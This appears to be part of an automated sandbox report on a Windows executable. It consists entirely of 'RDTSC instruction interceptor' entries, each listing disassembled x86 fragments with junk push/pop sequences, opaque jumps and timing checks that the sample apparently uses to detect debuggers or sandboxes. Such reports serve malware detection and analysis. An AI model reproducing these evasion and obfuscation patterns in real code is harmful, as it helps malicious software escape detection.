Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371556 second address: 137155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724C7 second address: 13724D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF6D0B64816h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724D5 second address: 1372568 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FF6D0B95BE8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b sbb di, 99D8h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov dword ptr [ebp+12469C3Ch], edx 0x0000003d mov bh, al 0x0000003f mov eax, dword ptr [ebp+122D1669h] 0x00000045 movsx edi, dx 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FF6D0B95BE8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov ebx, 2244362Fh 0x00000069 jmp 00007FF6D0B95BEFh 0x0000006e mov ebx, dword ptr [ebp+122D2955h] 0x00000074 nop 0x00000075 push esi 0x00000076 jo 00007FF6D0B95BECh 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1377442 second address: 1377446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1376715 second address: 1376719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1377446 second address: 137744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137744C second address: 13774E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF6D0B95BE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jmp 00007FF6D0B95BECh 0x0000002c mov edi, dword ptr [ebp+122D1C97h] 0x00000032 mov bl, D3h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FF6D0B95BE8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 jg 00007FF6D0B95BEAh 0x00000056 push 00000000h 0x00000058 add dword ptr [ebp+122D38ECh], ecx 0x0000005e jmp 00007FF6D0B95BEEh 0x00000063 xchg eax, esi 0x00000064 jmp 00007FF6D0B95BF5h 0x00000069 push eax 0x0000006a pushad 0x0000006b push ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13785BB second address: 13785C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13785C1 second address: 13785C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137A52A second address: 137A52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C43A second address: 137C43E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C43E second address: 137C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF6D0B64828h 0x0000000c jmp 00007FF6D0B64829h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FF6D0B64818h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 add edi, dword ptr [ebp+122D1E4Ah] 0x00000036 push 00000000h 0x00000038 sub edi, dword ptr [ebp+122D2304h] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 je 00007FF6D0B64816h 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137E6B8 second address: 137E6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF6D0B95BEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137E6D1 second address: 137E6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C659 second address: 137C66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C66B second address: 137C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851B4 second address: 13851EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FF6D0B95BE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FF6D0B95BF5h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF6D0B95BEAh 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851EA second address: 13851EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851EE second address: 13851F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851F7 second address: 138521D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF6D0B6481Dh 0x0000000b popad 0x0000000c jng 00007FF6D0B64818h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FF6D0B64816h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138876E second address: 1388773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C218 second address: 138C22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C301 second address: 138C312 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C312 second address: 138C318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C48B second address: 138C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C491 second address: 138C4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF6D0B64820h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C4AE second address: 138C4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B95BF5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C4D0 second address: 138C4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392B08 second address: 1392B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392B10 second address: 1392B26 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B64816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jp 00007FF6D0B64816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392F20 second address: 1392F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF6D0B95BE6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jns 00007FF6D0B95BE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FF6D0B95BEEh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 139339D second address: 13933A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13936BF second address: 13936C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1394E57 second address: 1394E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1394E5D second address: 1394E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF6D0B95BE6h 0x0000000a jp 00007FF6D0B95BE6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13987CA second address: 13987DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF6D0B6481Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jne 00007FF6D0B64816h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13987DE second address: 13987E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95C00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B0ED second address: 13498C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF6D0B64818h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D379Fh], ebx 0x0000002b mov dx, si 0x0000002e popad 0x0000002f call dword ptr [ebp+122D18E1h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FF6D0B6481Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B6C9 second address: 136B6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B876 second address: 136B88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64825h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B90F second address: 136B916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B916 second address: 136B957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64827h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF6D0B64821h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF6D0B6481Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B957 second address: 136B996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B95BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF6D0B95BF5h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136BA38 second address: 136BA3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C032 second address: 136C074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ecx, 66F7D5ADh 0x00000010 push 0000001Eh 0x00000012 movsx edi, bx 0x00000015 nop 0x00000016 push esi 0x00000017 jnl 00007FF6D0B95BECh 0x0000001d jnl 00007FF6D0B95BE6h 0x00000023 pop esi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007FF6D0B95BECh 0x0000002d jl 00007FF6D0B95BE6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C4F7 second address: 136C4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C4FC second address: 134A5B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FF6D0B95BE8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call dword ptr [ebp+122D1E36h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF6D0B95BF4h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 134A5B5 second address: 134A5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF6D0B64816h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13992D5 second address: 13992D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13992D9 second address: 13992FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF6D0B64828h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13992FB second address: 13992FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13992FF second address: 1399303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1399483 second address: 139948D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 139FE68 second address: 139FE86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64829h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A540E second address: 13A5428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FF6D0B95BF3h 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5428 second address: 13A542E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A542E second address: 13A5432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5432 second address: 13A544E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF6D0B6481Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A544E second address: 13A5452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5452 second address: 13A5458 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5BD4 second address: 13A5BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A50CA second address: 13A50EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF6D0B64816h 0x0000000a jmp 00007FF6D0B6481Bh 0x0000000f jng 00007FF6D0B64816h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5E95 second address: 13A5E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5E9F second address: 13A5EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5EA4 second address: 13A5ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF6D0B95BEBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5ECB second address: 13A5ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5FF8 second address: 13A5FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A5FFC second address: 13A6008 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6D0B64816h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6008 second address: 13A6012 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95BF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6012 second address: 13A6018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6018 second address: 13A6039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF6D0B95BF8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6039 second address: 13A6043 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF6D0B64816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6043 second address: 13A604C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6462 second address: 13A6466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A6466 second address: 13A646A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13A646A second address: 13A64B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF6D0B6481Dh 0x00000010 pushad 0x00000011 jmp 00007FF6D0B64826h 0x00000016 jmp 00007FF6D0B64822h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13AD0CB second address: 13AD0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF6D0B95BE6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13AD0DB second address: 13AD0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B64824h 0x00000009 popad 0x0000000a jnp 00007FF6D0B6482Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13ABADB second address: 13ABAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13ABAE1 second address: 13ABAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13ABDD4 second address: 13ABDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF6D0B95BE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13ABDE3 second address: 13ABDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
